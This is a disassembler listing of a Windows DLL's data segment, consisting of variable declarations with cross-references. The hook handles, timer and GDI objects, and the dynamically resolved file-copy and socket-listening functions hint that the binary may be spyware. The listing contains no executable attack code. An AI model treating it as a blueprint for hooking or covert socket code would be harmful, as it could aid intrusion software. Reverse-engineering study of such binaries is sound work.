extrn GdiplusShutdown:dword ; DATA XREF: GdiplusShutdown_thunk+2�o
; j_GdiplusShutdown_thunk�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 100241CCh
align 10h
; HDC hdc
hdc dd 0 ; DATA XREF: TimerFunc+B3�r
; TimerFunc+C4�r ...
; UINT_PTR dword_100241D4
dword_100241D4 dd 0 ; sub_1000AF7F+3A�w ...
dd 0
; HGDIOBJ h
h dd 0 ; DATA XREF: TimerFunc:loc_1000308A�r
; sub_1000537C+DC�w ...
; LPCSTR Dest
Dest dd 0 ; DATA XREF: sub_100071C0+DF�w
; sub_100071C0+105�r ...
dd 87h dup(0)
dd 0F78h dup(?)
dword_100281E0 dd ? ; sub_100010AC+3�o ...
; UINT_PTR uIDEvent
uIDEvent dd ? ; DATA XREF: TimerFunc+8F�r
; sub_1000537C+1E6�w
; FILETIME CreationTime
CreationTime FILETIME <?> ; DATA XREF: sub_1000291D+168�o
; sub_1000291D+16D�o ...
dword_100281F0 dd ? ; sub_100071C0+58�r ...
align 8
dword_100281F8 dd ? ; sub_10004DAA+2A4�r ...
dword_100281FC dd ? ; sub_100050D9+1BE�r ...
; HANDLE dword_10028200
dword_10028200 dd ? ; sub_10007B34+87�r ...
dd 0FFFh dup(?)
dword_1002C200 dd 2 dup(?) ; sub_1000103A+3�o
; HMODULE hModule
hModule dd ? ; DATA XREF: sub_1000A318+612�w
; sub_1000A318+632�r ...
; void *dword_1002C20C
dword_1002C20C dd ? ; sub_1000878F+1054�r ...
; int dword_1002C210
dword_1002C210 dd ? ; sub_10004960+81�r ...
; HANDLE hFindFile
hFindFile dd ? ; DATA XREF: sub_100071C0+51�w
; sub_100071C0+5E�r ...
dd 1000h dup(?)
dword_10030218 dd ? ; TimerFunc+1EE�o ...
dword_1003021C dd ? dd 2 dup(?)
; void *dword_10030228
dword_10030228 dd ? ; sub_1000878F+F9C�r ...
; HANDLE hHandle
hHandle dd ? ; DATA XREF: TimerFunc+43�r
; TimerFunc:loc_1000307D�r ...
; LPSTR lpBuffer
lpBuffer dd ? ; DATA XREF: sub_10007B34+108�w
; sub_10007B34+12E�r ...
dd 0FFFh dup(?)
dword_10034230 dd ? dword_10034234 dd ? ; sub_10007B34+81�r ...
dword_10034238 dd 2 dup(?) ; sub_1000103A+D�o
; struct tagRECT rc
rc tagRECT <?> ; DATA XREF: sub_10004DAA+1F5�w
; sub_10004DAA+20F�r ...
dword_10034250 dd 4 dup(?) ; TimerFunc+20B�o ...
; void *dword_10034260
dword_10034260 dd ? ; sub_1000878F+EE4�r ...
dword_10034264 dd 40h dup(?) ; sub_1000291D+8F�o ...
; void *dword_10034364
dword_10034364 dd ? ; sub_1000878F+298�r ...
dd 31h dup(?)
; HGDIOBJ ho
ho dd ? ; DATA XREF: TimerFunc+BF�w
; TimerFunc+E3�r ...
dd 0Dh dup(?)
; void *dword_10034464
dword_10034464 dd ? ; sub_10003786+12D�r ...
dd 18Fh dup(?)
; void *dword_10034AA4
dword_10034AA4 dd ? ; sub_1000878F+3F3�r ...
dd 0C7h dup(?)
dword_10034DC4 dd ? ; sub_100108A3+5C5�r ...
dd 0C6h dup(?)
; LPCSTR lpString
lpString dd ? ; DATA XREF: sub_100015CE+539�r
; sub_100015CE+567�r
; LPSTR lpString1
lpString1 dd ? ; DATA XREF: sub_100015CE+3B5�w
; sub_100015CE+3C6�r ...
dd 0C7h dup(?)
; LPCSTR dword_10035404
dword_10035404 dd ? ; sub_100108A3+5B1�r ...
dd 0C6h dup(?)
; LPCSTR dword_10035720
dword_10035720 dd ? ; sub_100015CE+599�r ...
; LPSTR dword_10035724
dword_10035724 dd ? ; sub_100015CE+42F�r ...
dd 0C7h dup(?)
dword_10035A44 dd ? ; sub_10011167+53E�r
dd 0C7h dup(?)
; LPSTR dword_10035D64
dword_10035D64 dd ? ; sub_100015CE+61B�r
dd 18Fh dup(?)
; LPSTR dword_100363A4
dword_100363A4 dd ? ; sub_100015CE+660�r
dd 18Fh dup(?)
; LPSTR dword_100369E4
dword_100369E4 dd ? ; sub_100015CE+6A5�r
dd 18Fh dup(?)
dword_10037024 dd ? ; .text:1000CBC5�r ...
dd 3Fh dup(?)
dword_10037124 dd ? ; TimerFunc+1E3�r ...
dd ?
dword_1003712C dd ? ; sub_10010623+129�r
dd 2000h dup(?)
; void *dword_1003F130
dword_1003F130 dd ? ; sub_1000878F+1192�r ...
dd 18Fh dup(?)
; void *dword_1003F770
dword_1003F770 dd ? ; sub_1000878F+1449�r ...
dd 0FFFh dup(?)
; void *dword_10043770
dword_10043770 dd ? ; sub_100050D9+6C�r ...
dd 0FFFh dup(?)
; void *dword_10047770
dword_10047770 dd ? ; sub_1000878F+16FF�r ...
dd 0FFFh dup(?)
; LPSTR dword_1004B770
dword_1004B770 dd ? ; TimerFunc+2D0�w ...
dd 0FFFh dup(?)
; void *Dst
Dst dd ? ; DATA XREF: sub_1000878F+184�w
; sub_1000878F+192�r ...
dd 18Fh dup(?)
; void *dword_1004FDB0
dword_1004FDB0 dd ? ; sub_1000878F+94E�w
dd 1009h dup(?)
; LPSTR dword_10053DD8
dword_10053DD8 dd ? ; sub_1000A318+697�r ...
dd 0FFFh dup(?)
; void *dword_10057DD8
dword_10057DD8 dd ? ; sub_1000878F+A7A�w
dd 3Fh dup(?)
; LPSTR dword_10057ED8
dword_10057ED8 dd ? ; sub_1000A318+AA3�r ...
dd 0FFFh dup(?)
; void *dword_1005BED8
dword_1005BED8 dd ? ; sub_1000878F+B44�w
dd 0FFFh dup(?)
; LPSTR dword_1005FED8
dword_1005FED8 dd ? ; sub_1000878F+C0E�w ...
dd 17FFh dup(?)
; char byte_10065ED8[]
byte_10065ED8 db 500h dup(?) ; DATA XREF: TimerFunc+1C2�o
; TimerFunc+3B1�o ...
dword_100663D8 dd 40h dup(?) ; sub_10001F5B+E1�o
; char String[]
String db 11Ch dup(?) ; DATA XREF: sub_10001DE0+AF�o
; sub_10001DE0+12F�o ...
; LPVOID lpParameter
lpParameter dd ? ; DATA XREF: sub_1000A318+A87�w
; sub_1000A318+ABA�r ...
dd 0FFFh dup(?)
; char Str[]
Str db 100h dup(?) ; DATA XREF: TimerFunc+378�o
; TimerFunc+38C�o ...
; char byte_1006A6F4[]
byte_1006A6F4 db 200h dup(?) ; DATA XREF: sub_100050D9+80�o
; sub_100050D9+C5�o ...
dword_1006A8F4 dd ? ; resolved to->SHELL32.SHGetSpecialFolderPathA ; sub_1000878F+C88�r ...
dword_1006A8F8 dd ? ; sub_1000A318+655�r
dword_1006A8FC dd ? ; resolved to->KERNEL32.CopyFileA ; sub_1000B7EF+767�r
dword_1006A900 dd ? ; sub_100050D9+A0�w ...
dword_1006A904 dd ? ; sub_100050D9+141�w ...
; HHOOK hhk
hhk dd ? ; DATA XREF: TimerFunc+61�r
; TimerFunc+6E�w ...
; HHOOK dword_1006A90C
dword_1006A90C dd ? ; sub_10004960+EE�r ...
; HHOOK dword_1006A910
dword_1006A910 dd ? ; TimerFunc+85�w ...
dword_1006A914 dd ? ; HBRUSH hbr
hbr dd ? ; DATA XREF: sub_1000537C+13A�r
; sub_1000C9DC+2D�w
; HGDIOBJ dword_1006A91C
dword_1006A91C dd ? ; sub_1000C9DC+7D�w
; HGDIOBJ dword_1006A920
dword_1006A920 dd ? ; sub_100050D9+147�r ...
; char byte_1006A924[]
byte_1006A924 db 40h dup(?) ; DATA XREF: TimerFunc+2F2�o
; sub_10009FE2+58�o ...
; HHOOK dword_1006A964
dword_1006A964 dd ? ; sub_10003460+44�w ...
; HWND hWnd
hWnd dd ? ; DATA XREF: sub_10003460+1B�r
; sub_10003460+59�w ...
dword_1006A96C dd ? ; .text:10002094�w ...
; UINT Msg
Msg dd ? ; DATA XREF: sub_10003460+61�w
; sub_10003541+12�r ...
; char String1[]
String1 db 8000h dup(?) ; DATA XREF: sub_10003786+5D�o
; sub_10003786+925�o ...
dword_10072974 dd 200h dup(?) ; char byte_10073174[]
byte_10073174 db 800h dup(?) ; DATA XREF: sub_10011AA3+131�o
; sub_10011AA3+14F�o ...
dword_10073974 dd ? ; sub_10003786+EFE�w ...
dword_10073978 dd ? ; sub_10003786+D36�w ...
dword_1007397C dd ? ; sub_10011CA2+4A�r
dword_10073980 dd ? ; sub_100034DC:loc_10003518�w
dword_10073984 dd ? ; char byte_10073988[]
byte_10073988 db 4 dup(?) ; DATA XREF: sub_10001DE0+BE�o
; char Source[]
Source db 4 dup(?) ; DATA XREF: sub_10001F5B+48�o
; char byte_10073990[]
byte_10073990 db 4 dup(?) ; DATA XREF: sub_10009FE2+24D�o
; char byte_10073994[]
byte_10073994 db 4 dup(?) ; DATA XREF: sub_1000A318+1EB�o
; char byte_10073998[]
byte_10073998 db 4 dup(?) ; DATA XREF: sub_1000A318+1FD�o
; char byte_1007399C[]
byte_1007399C db 4 dup(?) ; DATA XREF: sub_1000A318+20C�o
dword_100739A0 dd ? dword_100739A4 dd ? ; char byte_100739A8[]
byte_100739A8 db 4 dup(?) ; DATA XREF: sub_1000A318+AF2�o
; char byte_100739AC[]
byte_100739AC db 4 dup(?) ; DATA XREF: sub_1000B7EF+9DB�o
dword_100739B0 dd ? dword_100739B4 dd ? dword_100739B8 dd 2 dup(?) dword_100739C0 dd ? ; .text:1000E9C4�r
dd 13h dup(?)
dword_10073A10 dd ? ; .text:1000E987�r ...
dd 0Dh dup(?)
dword_10073A48 dd ? ; sub_1000FBCC+2F�r ...
dword_10073A4C dd ? ; sub_1000FDDB+F1�r ...
dword_10073A50 dd ? ; sub_1000FBCC+47�r ...
dword_10073A54 dd ? ; sub_1000FBCC+113�r ...
dword_10073A58 dd ? ; sub_1000FDDB+1A5�r ...
; void *dword_10073A5C
dword_10073A5C dd ? ; sub_100102E8+24�r ...
dd 3Fh dup(?)
dword_10073B5C dd ? ; sub_1000FBCC+E5�r ...
dword_10073B60 dd ? ; sub_1000FDDB+51�r ...
dword_10073B64 dd ? ; sub_1000FBCC+A1�r ...
dword_10073B68 dd ? ; sub_1000FDDB+D�r ...
dword_10073B6C dd ? ; sub_1000FBCC+5D�r ...
dword_10073B70 dd ? ; sub_1000FDDB+135�r ...
dword_10073B74 dd ? ; sub_1000FDDB+D9�r ...
; HANDLE hEvent
hEvent dd ? ; DATA XREF: sub_100102E8:loc_10010333�r
; sub_100108A3+15D�r ...
dword_10073B7C dd ? ; sub_1000FBCC+CF�r ...
dword_10073B80 dd ? ; sub_1000FDDB+161�r ...
dword_10073B84 dd ? ; sub_1000FBCC+73�r ...
dword_10073B88 dd ? ; sub_1000FDDB+3B�r ...
dword_10073B8C dd ? ; sub_1000FDDB+AD�r ...
dword_10073B90 dd ? ; .text:1000FFCB�r
dword_10073B94 dd 82h dup(?) dword_10073D9C dd ? ; sub_1000FDDB+107�r ...
dword_10073DA0 dd ? ; sub_1000FDDB+11D�r ...
dword_10073DA4 dd ? ; sub_1000FBCC+8B�r ...
dword_10073DA8 dd ? ; sub_1000FDDB+69�r ...
dword_10073DAC dd ? ; sub_1000FBCC+D�r ...
dword_10073DB0 dd ? ; sub_1000FBCC+FB�r ...
dword_10073DB4 dd ? ; sub_1000FBCC+B7�r ...
dword_10073DB8 dd ? ; sub_1000FDDB+25�r ...
dword_10073DBC dd ? ; sub_1000FDDB+14B�r ...
dword_10073DC0 dd ? ; sub_1000FDDB+95�r ...
dword_10073DC4 dd ? ; sub_1000FDDB+7F�r ...
dword_10073DC8 dd ? ; sub_1000FDDB+18F�r ...
dword_10073DCC dd ? ; sub_1000FDDB+C3�r ...
dword_10073DD0 dd ? ; sub_1000FDDB+179�r ...
dword_10073DD4 dd ? ; sub_1001036D+34�w
dword_10073DD8 dd ? dword_10073DDC dd ? ; .text:1000F214�r ...
dword_10073DE0 dd ? ; LPCSTR dword_10073DE4
dword_10073DE4 dd ? ; sub_10011167+140�r ...
; LPCSTR Memory
Memory dd ? ; DATA XREF: sub_100108A3+B7�w
; sub_100108A3+10A�r ...
dword_10073DEC dd ? ; sub_10011167:loc_1001198D�r ...
dword_10073DF0 dd ? ; sub_10011167+15B�r ...
dword_10073DF4 dd ? ; sub_100108A3:loc_10011082�r ...
dword_10073DF8 dd ? ; sub_100108A3+124�r ...
dword_10073DFC dd ? ; sub_1001087A�r ...
dword_10073E00 dd ? ; sub_100108A3+3F�r ...
; volatile LONG Addend
Addend dd ? ; DATA XREF: sub_1001361F+24�o
; char byte_10073E08[]
byte_10073E08 db 4 dup(?) ; DATA XREF: sub_100100FD+107�o
dword_10073E0C dd ? dword_10073E10 dd 3 dup(?) ; HMODULE dword_10073E1C
dword_10073E1C dd ? ; sub_10016C4C+14E�r ...
dword_10073E20 dd ? ; sub_10013A20:loc_10013B06�w ...
align 8
dword_10073E28 dd ? ; sub_10014B0F+229�o
dword_10073E2C dd ? dword_10073E30 dd ? dword_10073E34 dd 40h dup(?) ; sub_10016C4C+10C�o ...
dword_10073F34 dd ? ; sub_10016BBE+6A�w
; char name[]
name db 40h dup(?) ; DATA XREF: sub_10014B0F+6A�o
; sub_10016C4C+1C7�o ...
dword_10073F78 dd ? ; sub_10014B0F+1FC�w ...
dword_10073F7C dd ? ; sub_10016C4C+16C�r ...
dword_10073F80 dd ? ; resolved to->WS2_32.accept ; sub_10014B0F+E8A�r ...
dword_10073F84 dd ? ; resolved to->WS2_32.bind ; sub_10015BF1+BE8�r ...
dword_10073F88 dd ? ; sub_10015BF1+C30�r ...
dword_10073F8C dd ? dword_10073F90 dd ? dword_10073F94 dd ? dword_10073F98 dd ? dword_10073F9C dd ? ; _CRT_INIT(x,x,x)+10�w ...
; LPVOID lpAddress
lpAddress dd ? ; DATA XREF: sub_10017741+2�r
; sub_1001780B+2�r ...
dword_10073FA4 dd ? ; sub_10017DDC+56�w ...
dword_10073FA8 dd ? ; sub_10017B39+90�r ...
; volatile LONG Destination
Destination dd ? ; DATA XREF: sub_100176F1+3�r
; sub_100176F1+13�o ...
dword_10073FB0 dd ? ; sub_1001785F:loc_10017892�r ...
dword_10073FB4 dd ? ; sub_1001785F+13�r ...
; void *dword_10073FB8
dword_10073FB8 dd ? ; sub_10017768+6E�r ...
; void *dword_10073FBC
dword_10073FBC dd ? ; sub_10017768+18�r ...
dd 0Ch dup(?)
dword_10073FF0 dd ? ; sub_10018AAB+10�o ...
byte_10073FF4 db ? ; DATA XREF: sub_10018AAB�r
; sub_10018AAB+9�w
align 4
dword_10073FF8 dd 4 dup(?) ; sub_1001AA61:loc_1001AA7D�o
dword_10074008 dd 2 dup(?) gdiplus_dll_handle dd ? ; DATA XREF: .rdata:10020468�o
dword_10074014 dd ? ; sub_1001AE90+144�r ...
; __int32 Offset
Offset dd ? ; DATA XREF: sub_1001AE90+CA�w
; sub_1001AE90+135�r ...
dword_1007401C dd ? ; sub_1001B0E0+12�r ...
byte_10074020 db ? ; DATA XREF: sub_1001AE90+B2�w
align 4
dd ?
db ?
dword_10074029 dd ? word_1007402D dw ? ; DATA XREF: sub_1001AE90+172�w
byte_1007402F db ? ; DATA XREF: sub_1001AE90+A3�w
; char Filename[]
Filename db 0ECh dup(?) ; DATA XREF: sub_1001AE00+3A�o
; sub_1001AE90+6�o ...
dword_1007411C dd ? ; sub_1001AE90+E7�r ...
dword_10074120 dd ? ; sub_1001AE90+154�r ...
dword_10074124 dd ? ; sub_1001B110+21�r
dword_10074128 dd 802h dup(?) ; sub_1001B1D0+41�o ...
dword_10076130 dd ? ; sub_1001AE90+122�r ...
word_10076134 dw ? ; DATA XREF: sub_1001B2C0+3�o
; sub_1001B3E0+4F�r ...
align 4
dd 7Eh dup(?)
db 2 dup(?)
word_10076332 dw ? ; DATA XREF: sub_1001B2C0+24�o
; FILE *File
File dd ? ; DATA XREF: sub_1001AE00+15�w
; sub_1001AE00:loc_1001AE5E�r ...
dword_10076338 dd ? ; sub_1001B2F0+2A�w ...
; FILE *dword_1007633C
dword_1007633C dd ? ; sub_1001AE90+F6�r ...
dd ?
dword_10076344 dd ? ; sub_1001B2F0+19�w ...
; FILE *dword_10076348
dword_10076348 dd ? dword_1007634C dd ? ; sub_1001B770+40�w ...
dword_10076350 dd ? ; sub_1001B4E0+A3�r ...
dword_10076354 dd ? ; sub_1001B5C0+63�r ...
dword_10076358 dd ? ; sub_1001B640+8F�r ...
dword_1007635C dd ? ; sub_1001B5C0+55�r ...
dword_10076360 dd ? ; sub_1001B4E0+20�w ...
dword_10076364 dd ? ; sub_1001B4E0+5A�r ...
dword_10076368 dd ? ; sub_1001B770+28�w ...
; void *dword_1007636C
dword_1007636C dd ? ; sub_1001B4E0+B8�r ...
dword_10076370 dd ? ; sub_1001B640+5E�r ...
dword_10076374 dd ? ; sub_1001B4E0+3F�r ...
dword_10076378 dd ? ; sub_1001BE50+5C�r ...
dword_1007637C dd ? ; sub_1001BE50+8�w ...
word_10076380 dw ? ; DATA XREF: sub_1001C4F0+163�w
; sub_1001C790+2F�r
align 4
dd 1FDh dup(?)
word_10076B78 dw ? ; DATA XREF: sub_1001BE50+70�w
; sub_1001BF50+E�o ...
align 4
dd 1FEh dup(?)
dword_10077374 dd ? ; sub_1001BF50+BC�o ...
dd 4 dup(?)
word_10077388 dw ? ; DATA XREF: sub_1001BE50:loc_1001BF38�w
; sub_1001BF50+C1�o ...
align 4
dd 80Dh dup(?)
word_100793C0 dw ? ; DATA XREF: sub_1001C4F0+16A�w
; sub_1001C790+46�r
align 4
dd 1FDh dup(?)
dword_10079BB8 dd ? ; sub_1001BE50+8A�r
word_10079BBC dw ? ; DATA XREF: sub_1001BF50+4B�o
; sub_1001C0F0+8�o ...
word_10079BBE dw ? ; DATA XREF: sub_1001C0F0+69�w
; sub_1001C0F0+7E�w
word_10079BC0 dw ? ; DATA XREF: sub_1001C0F0:loc_1001C177�w
; sub_1001C0F0:loc_1001C180�w
align 4
dd 11h dup(?)
dword_10079C08 dd ? ; sub_1001BE50+4D�w ...
dd 80h dup(?)
byte_10079E0C db ? ; DATA XREF: sub_1001BF50+9�o
; sub_1001C0F0+32�r ...
align 10h
dd 7Eh dup(?)
db ?
byte_1007A009 db 3 dup(?) ; DATA XREF: sub_1001C0F0+16�o
; sub_1001C230+6�o
dword_1007A00C dd ? ; sub_1001BF50:loc_1001C007�o ...
dword_1007A010 dd ? ; sub_1001C230+134�r
dd 8 dup(?)
word_1007A034 dw ? ; DATA XREF: sub_1001BF50+4�o
; sub_1001C390+8�r
align 4
dd 0FEh dup(?)
dword_1007A430 dd ? ; sub_1001C420�r ...
dword_1007A434 dd ? ; sub_1001C4F0+42�r ...
dword_1007A438 dd ? ; sub_1001C4F0:loc_1001C553�r ...
dword_1007A43C dd ? ; sub_1001C4F0:loc_1001C529�r ...
dword_1007A440 dd ? ; sub_1001C4F0+4E�r ...
dword_1007A444 dd ? ; sub_1001C4F0+CD�r ...
word_1007A448 dw ? ; DATA XREF: sub_1001C6A0+A�o
; sub_1001C6A0+3A�o ...
word_1007A44A dw ? ; DATA XREF: sub_1001C6A0+94�w
; sub_1001C6A0+9C�o ...
dd 6 dup(?)
db 2 dup(?)
word_1007A466 dw ? ; DATA XREF: sub_1001C6A0+75�o
word_1007A468 dw ? ; DATA XREF: sub_1001C6A0+24�o
; sub_1001C6A0+69�w ...
align 4
word_1007A46C dw ? ; DATA XREF: sub_1001C4F0+5B�w
; sub_1001C4F0+E9�r ...
word_1007A46E dw ? ; DATA XREF: sub_1001C4F0+30�w
; sub_1001C4F0:loc_1001C568�r ...
dd 0FFh dup(?)
dword_1007A86C dd ? ; sub_1001C790:loc_1001C7B7�r ...
; VARIANTARG pvarg
pvarg VARIANTARG <?> ; DATA XREF: sub_1001C969+7�o
; sub_1001C987�o
dword_1007A880 dd ? ; sub_1001CBA7+120�w
dword_1007A884 dd ? ; sub_1001CBA7+19E�r
dword_1007A888 dd ? ; sub_1001CBA7+8C�r ...
dword_1007A88C dd ? dword_1007A890 dd ? ; DllEntryPoint+82�r
dword_1007A894 dd ? ; _CRT_INIT(x,x,x)+54�w ...
; void *dword_1007A898
dword_1007A898 dd ? align 200h
_data ends
end DllEntryPoint